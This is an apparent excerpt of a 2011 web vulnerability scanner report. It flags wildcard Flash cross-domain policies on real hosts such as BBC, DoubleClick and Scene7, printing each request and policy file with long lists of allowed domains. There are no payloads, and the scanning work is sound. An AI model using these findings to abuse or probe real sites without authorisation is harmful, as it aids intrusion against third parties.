Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:38:30 GMT
Server: Apache
X-Name: dmc-o01
Last-Modified: Tue, 23 Nov 2010 00:49:00 GMT
ETag: "3500060-a1-495adbd05d700"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://*.dotomi.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

6.70. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Sun, 15 May 2011 21:21:03 GMT
Date: Sun, 15 May 2011 21:19:03 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.71. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:49 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.72. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 11:30:02 GMT
Expires: Mon, 16 May 2011 11:30:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 49790
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.73. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 03:47:21 GMT
Expires: Mon, 16 May 2011 03:47:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 77543
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.74. http://s7d5.scene7.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s7d5.scene7.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"25343-1305036218000"
Accept-Ranges: bytes
Last-Modified: Tue, 10 May 2011 14:03:38 GMT
Content-Type: application/xml
Content-Length: 25343
Expires: Mon, 16 May 2011 05:25:36 GMT
Date: Mon, 16 May 2011 01:35:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.laneventure.com"/>
<allow-access-from domain="*.pearsonco.com"/>
<allow-access-from domain="*.targetimg1.com"/>
<allow-access-from domain="*.targetimg2.com"/>
<allow-access-from domain="*.targetimg3.com"/>
<allow-access-from domain="*.agilent.com"/>
<allow-access-from domain="*.artvan.com"/>
<allow-access-from domain="*.mizunogolf.com"/>
<allow-access-from domain="*.talbots.com"/>
<allow-access-from domain="giftadvisor.indelible.tv"/>
<allow-access-from domain="*.taaz.com"/>
<allow-access-from domain="www.flashmaxx.com"/>
<allow-access-from domain="flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.armstrong.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="sassomedia.com"/>
<allow-access-from domain="*.photoshop.com"/>
<allow-access-from domain="kijones.host.adobe.com"/>
<allow-access-from domain="ag2010.stage.ascedia.com"/>
<allow-access-from domain="*.trex.com"/>
<allow-access-from domain="*.trexco.com"/>
<allow-access-from domain="*.vermontcountrystore.com"/>
<allow-access-from domain="*.pabng.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.k2admin.com"/>
<allow-access-from domain="*.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.shopdeluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.nimblefish.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fossil.com"/>
<allow-access-from domain="www.michele.com"/>
<allow-access-from domain="127.0.0.1" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.polarisindustries.com"/>
<allow-access-from domain="backstage.polarisindustries.com"/>
<allow-access-from domain="s7diod-isorigin.scene7.com"/>
<allow-access-from domain="origin-na1.scene7.com"/>
<allow-access-from domain="origin-na2.scene7.com"/>
<allow-access-from domain="origin-na3.scene7.com"/>
<allow-access-from domain="origin-na4.scene7.com"/>
<allow-access-from domain="origin-na5.scene7.com"/>
<allow-access-from domain="origin-na6.scene7.com"/>
<allow-access-from domain="origin-na7.scene7.com"/>
<allow-access-from domain="origin-na8.scene7.com"/>
<allow-access-from domain="s7d1.scene7.com"/>
<allow-access-from domain="s7d2.scene7.com"/>
<allow-access-from domain="s7d3.scene7.com"/>
<allow-access-from domain="s7d4.scene7.com"/>
<allow-access-from domain="s7ondemand1.scene7.com"/>
<allow-access-from domain="irtex1.scene7.com"/>
<allow-access-from domain="10.80.1.144"/>
<allow-access-from domain="10.80.1.152"/>
<allow-access-from domain="10.80.1.42"/>
<allow-access-from domain="origin-apps.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps.scene7.com"/>
<allow-access-from domain="isstaging.scene7.com"/>
<allow-access-from domain="techservices.scene7.com"/>
<allow-access-from domain="ecomtest1.hancockms.com"/>
<allow-access-from domain="www.hancockfabrics.com"/>
<allow-access-from domain="www.eddiebauer.com"/>
<allow-access-from domain="dev.eddiebauer.com"/>
<allow-access-from domain="qa.eddiebauer.com"/>
<allow-access-from domain="testvipd1.scene7.com"/>
<allow-access-from domain="testvipd2.scene7.com"/>
<allow-access-from domain="testvipd3.scene7.com"/>
<allow-access-from domain="testvipd4.scene7.com"/>
<allow-access-from domain="s7ondemand3.scene7.com"/>
<allow-access-from domain="s7ondemand7.scene7.com"/>
<allow-access-from domain="s7ips1.scene7.com"/>
<allow-access-from domain="s7ondemand5.scene7.com"/>
<allow-access-from domain="*.sample.scene7.com"/>
<allow-access-from domain="origin-search.scene7.com"/>
<allow-access-from domain="staging.scene7.com"/>
<allow-access-from domain="s7testis.adobe.com"/>
<allow-access-from domain="sportstown.crosscomm.net"/>
<allow-access-from domain="sportstown.com"/>
<allow-access-from domain="*.sportstown.com"/>
<allow-access-from domain="www.anthropologie.com"/>
<allow-access-from domain="staging.anthropologie.us"/>
<allow-access-from domain="smartwool.dev.summitprojects.com"/>
<allow-access-from domain="smartwool.stage.summitprojects.com"/>
<allow-access-from domain="www.smartwool.com"/>
...[SNIP]...
<allow-access-from domain="testvipd5.scene7.com"/>
<allow-access-from domain="www.roadrunnersports.com"/>
<allow-access-from domain="dev.atgnow.com"/>
<allow-access-from domain="staging.roadrunnersports.com"/>
<allow-access-from domain="*.sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="sportstown.com" secure="true"/>
...[SNIP]...
<allow-access-from domain=" s7.sears.com "/>
<allow-access-from domain="*.myctmh.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.instrum3nt.com"/>
<allow-access-from domain="*.tommybahama.com"/>
<allow-access-from domain="demo.ml.nurun.com"/>
<allow-access-from domain="trek07.hansondodge.com"/>
<allow-access-from domain="*.dexdealer.com" />
<allow-access-from domain="*.bontrager.com" />
<allow-access-from domain="*.trekbikes.com" />
<allow-access-from domain="*.readyfortheroadahead.com" />
<allow-access-from domain="*.belk.com"/>
<allow-access-from domain="*.sears.com"/>
<allow-access-from domain="*.dayport.com"/>
<allow-access-from domain="eaqa2prod1234.ethanallen.com"/>
<allow-access-from domain="devaws.ethanallen.com"/>
<allow-access-from domain="elm.kharv.com"/>
<allow-access-from domain="serotoninsoftware.com"/>
<allow-access-from domain="*.ethanallen.com"/>
<allow-access-from domain="*.wishbook.com"/>
<allow-access-from domain="*.entriq.net"/>
<allow-access-from domain="test-web1-www.lbiatlanta.com"/>
<allow-access-from domain="*.newellco.com"/>
<allow-access-from domain="preview.graco.com"/>
<allow-access-from domain="*.gracobaby.com"/>
<allow-access-from domain="s.sears.com"/>
<allow-access-from domain="202.44.56.2"/>
<allow-access-from domain="202.44.58.2"/>
<allow-access-from domain="beta.graco.com"/>
<allow-access-from domain="*.burton.com"/>
<allow-access-from domain="*.ashleyfurniture.com" />
<allow-access-from domain="*.ashleyfurniturehomestore.com" />
<allow-access-from domain="s7sps1-staging.scene7.com" />
<allow-access-from domain="s7sps1.scene7.com" />
<allow-access-from domain="*.lokion.com"/>
<allow-access-from domain="*.vikingrange.com"/>
<allow-access-from domain="www.armstrong.com"/>
<allow-access-from domain="*.classscene.com"/>
<allow-access-from domain="*.classsceneqa.com"/>
<allow-access-from domain="*.classscenedemo.com"/>
<allow-access-from domain="*.fulltiltboots.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.karhuskico.com"/>
<allow-access-from domain="*.k2women.com"/>
<allow-access-from domain="*.k2snowboarding.com"/>
<allow-access-from domain="*.k2skis.com"/>
<allow-access-from domain="*.ridesnowboards.com"/>
<allow-access-from domain="*.lineskis.com"/>
<allow-access-from domain="*.5150snowboarding.com"/>
<allow-access-from domain="*.morrowsnowboards.com"/>
<allow-access-from domain="*.atlassnowshoe.com"/>
<allow-access-from domain="*.tubbssnowshoes.com"/>
<allow-access-from domain="*.k2telemark.com"/>
<allow-access-from domain="*.k2dealertools.com"/>
<allow-access-from domain="*.planet-earth-clothing.com"/>
<allow-access-from domain="*.k2skates.com"/>
<allow-access-from domain="*.k2iceskates.com"/>
<allow-access-from domain="*.snowshoes.com"/>
<allow-access-from domain="*.vashonstorefront.com"/>
<allow-access-from domain="*.adiofootwear.com"/>
<allow-access-from domain="*.adio.com"/>
<allow-access-from domain="4.59.112.138"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.store.americangirl.com"/>
<allow-access-from domain="agpmt-prod:7778"/>
<allow-access-from domain="agpmt-test:7777"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="*.jcpenney.com"/>
<allow-access-from domain="*.teamzonesports.com"/>
<allow-access-from domain="*.underarmour.com"/>
<allow-access-from domain="broadridge.mominc.com"/>
<allow-access-from domain="*.craftsman.com"/>
<allow-access-from domain="*.sothebys.com"/>
<allow-access-from domain="*.facebook.com"/>
<allow-access-from domain="*.thuzi.com"/>
<allow-access-from domain="*.samsclub.com"/>
<allow-access-from domain="161.169.79.10"/>
<allow-access-from domain="store.americangirl.com"/>
<allow-access-from domain="*.hansondodge.com"/>
<allow-access-from domain="*.thebrick.com"/>
<allow-access-from domain="s7demo.scene7.com"/>
<allow-access-from domain="*.richrelevance.com"/>
<allow-access-from domain="*.hit.homedepot.resource.com"/>
<allow-access-from domain="*.allurent.net"/>
<allow-access-from domain="*.ashro.com"/>
<allow-access-from domain="*.countrydoor.com"/>
<allow-access-from domain="*.ginnys.com"/>
<allow-access-from domain="*.grandpointe.com"/>
<allow-access-from domain="*.monroeandmain.com"/>
<allow-access-from domain="*.midnightvelvet.com"/>
<allow-access-from domain="*.raceteamgear.com"/>
<allow-access-from domain="*.swisscolony.com"/>
<allow-access-from domain="*.seventhavenue.com"/>
<allow-access-from domain="*.homevisions.com"/>
<allow-access-from domain="*.wards.com"/>
<allow-access-from domain="*.tenderfilet.com"/>
<allow-access-from domain="assets.k2sports.com"/>
<allow-access-from domain="assets.ridesnowboards.com"/>
<allow-access-from domain="assets1.k2sports.com"/>
<allow-access-from domain="assets1.ridesnowboards.com"/>
<allow-access-from domain="assets2.k2sports.com"/>
<allow-access-from domain="assets2.ridesnowboards.com"/>
<allow-access-from domain="161.211.2.28"/>
<allow-access-from domain="161.211.155.7"/>
<allow-access-from domain="ah-stg.fry.com"/>
<allow-access-from domain="cd-stg.fry.com"/>
<allow-access-from domain="gn-stg.fry.com"/>
<allow-access-from domain="gp-stg.fry.com"/>
<allow-access-from domain="hv-stg.fry.com"/>
<allow-access-from domain="mm-stg.fry.com"/>
<allow-access-from domain="mv-stg.fry.com"/>
<allow-access-from domain="mw-stg.fry.com"/>
<allow-access-from domain="rt-stg.fry.com"/>
<allow-access-from domain="rc-stg.fry.com"/>
<allow-access-from domain="tf-stg.fry.com"/>
<allow-access-from domain="sc-stg.fry.com"/>
<allow-access-from domain="sa-stg.fry.com"/>
<allow-access-from domain="shopdeluxe-v9-dev.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="shopdeluxe-v9-uat.deluxe.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="stage.coach.com"/>
<allow-access-from domain="*.coach.com"/>
<allow-access-from domain="demandware.edgesuite.net"/>
<allow-access-from domain="*.buildabear.com"/>
<allow-access-from domain="*.babwtest.com"/>
<allow-access-from domain="customshop.mesfire.com"/>
<allow-access-from domain="stage.homeinspiration.homedepot.com "/>
<allow-access-from domain="homeinspiration.homedepot.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="*.pointroll.com"/>
<allow-access-from domain="*.smartwool.com"/>
<allow-access-from domain="*.summitprojects.com"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="511.niteviewtech.com"/>
<allow-access-from domain="www.lauramercier.com"/>
<allow-access-from domain="*.lumberliquidators.com"/>
<allow-access-from domain="*.ae.com"/>
<allow-access-from domain="*.aezone.com"/>
<allow-access-from domain="s7everest.macromedia.com"/>
<allow-access-from domain="s7fuji.macromedia.com"/>
<allow-access-from domain="s7qa-is.macromedia.com"/>
<allow-access-from domain="officemax.companychecksandforms.com"/>
<allow-access-from domain="www.511deasbf.com"/>
<allow-access-from domain="*.511deasbf.com"/>
<allow-access-from domain="*.vcfcorp.com"/>
...[SNIP]...
<allow-access-from domain="*.asfurniture.com"/>
<allow-access-from domain="*.vcf.com"/>
...[SNIP]...
<allow-access-from domain="anthropologie.uat.venda.com"/>
<allow-access-from domain="anthropologie.live.venda.com"/>
<allow-access-from domain="*.511academy.com"/>
<allow-access-from domain="*.reedkrakoff.com"/>
<allow-access-from domain="stage.wearport.com"/>
<allow-access-from domain="*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.fds.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.macys.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.anthropologie.eu"/>
<allow-access-from domain="s7demo.host.adobe.com"/>
<allow-access-from domain="www.leadbased.com"/>
<allow-access-from domain="*.mxbi.com"/>
<allow-access-from domain="*.jordans.com"/>
<allow-access-from domain="jordans.com"/>
<allow-access-from domain="jordansqa.weymouthdesign.com"/>
<allow-access-from domain="*.mercury.com"/>
<allow-access-from domain="*.cb2.com"/>
<allow-access-from domain="*.landofnod.com"/>
<allow-access-from domain="*.crateandbarrel.com"/>
<allow-access-from domain="*.crateandbarrel.ca"/>
<allow-access-from domain="cim-dev.deluxe.com"/>
<allow-access-from domain="cim-qa.deluxe.com"/>
<allow-access-from domain="www.deluxe-check-order.com"/>
<allow-access-from domain="wwwpreprod.deluxe-check-order.com"/>
<allow-access-from domain="*.vfimagewear.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.zumiez.com"/>
<allow-access-from domain="zumiez.com"/>
<allow-access-from domain="*.vfc.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="service-apps.scene7.com"/>
<allow-access-from domain="service-apps-staging.scene7.com"/>
<allow-access-from domain="walmart.scene7.com"/>
<allow-access-from domain="s7ondemand1-apps-staging.scene7.com"/>
<allow-access-from domain="63.241.188.118"/>
<allow-access-from domain="63.241.188.119"/>
<allow-access-from domain="63.241.188.116"/>
<allow-access-from domain="63.241.188.120"/>
<allow-access-from domain="63.241.188.121"/>
<allow-access-from domain="63.241.188.117"/>
<allow-access-from domain="63.241.188.122"/>
<allow-access-from domain="63.241.188.123"/>
<allow-access-from domain="63.241.188.124"/>
<allow-access-from domain="63.241.188.125"/>
<allow-access-from domain="stage.store.americangirl.com"/>
<allow-access-from domain="*.kohls.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="media.kohls.com.edgesuite.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.edgeboss.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscorporation.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlscareers.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.kohlsoncampus.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.apiservice.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="98.129.79.154" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="httpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="rtmpCDN.factory515.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mixercast.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.fluid.com"/>
<allow-access-from domain="*.enlighten.com"/>
<allow-access-from domain="*.hunterdouglas.com"/>
<allow-access-from domain=".allurent.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="64.52.70.13"/>
<allow-access-from domain="64.52.70.30"/>
<allow-access-from domain="64.52.70.33"/>
<allow-access-from domain="64.52.70.60"/>
<allow-access-from domain="76.12.61.174"/>
<allow-access-from domain="*.kmart.com"/>
<allow-access-from domain="skavamp.com"/>
<allow-access-from domain="*.skavamp.com"/>
<allow-access-from domain="*.cloudfront.net"/>
<allow-access-from domain="www.grandinroad.com"/>
<allow-access-from domain="www.frontgate.com"/>
<allow-access-from domain="97.65.222.116"/>
<allow-access-from domain="97.65.222.115"/>
<allow-access-from domain="*.neptune.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="*.web.rga.com"/>
<allow-access-from domain="*.ny.rga.com"/>
<allow-access-from domain="content01.nimblefish.com"/>
<allow-access-from domain="cdn.nimblefish.com"/>
<allow-access-from domain="media.nimblefish.com"/>
<allow-access-from domain="nv.nimblefish.com"/>
<allow-access-from domain="app.nimblefish.com"/>
<allow-access-from domain="media.beta01.nimblefish.com"/>
<allow-access-from domain="nv.beta01.nimblefish.com"/>
<allow-access-from domain="app.beta01.nimblefish.com"/>
<allow-access-from domain="media.content01.nimblefish.com"/>
<allow-access-from domain="nv.content01.nimblefish.com"/>
<allow-access-from domain="app.content01.nimblefish.com"/>
<allow-access-from domain="*.511fbileeda.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.criticalmass.com"/>
<allow-access-from domain="*.theodorealexander.com"/>
<allow-access-from domain="*.hottopic.com"/>
<allow-access-from domain="*.teamworkathletic.com "/>
<allow-access-from domain="*.scene7.com"/>
<allow-access-from domain="*.shopvcf.com"/>
<allow-access-from domain="shopvcf.com"/>
<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
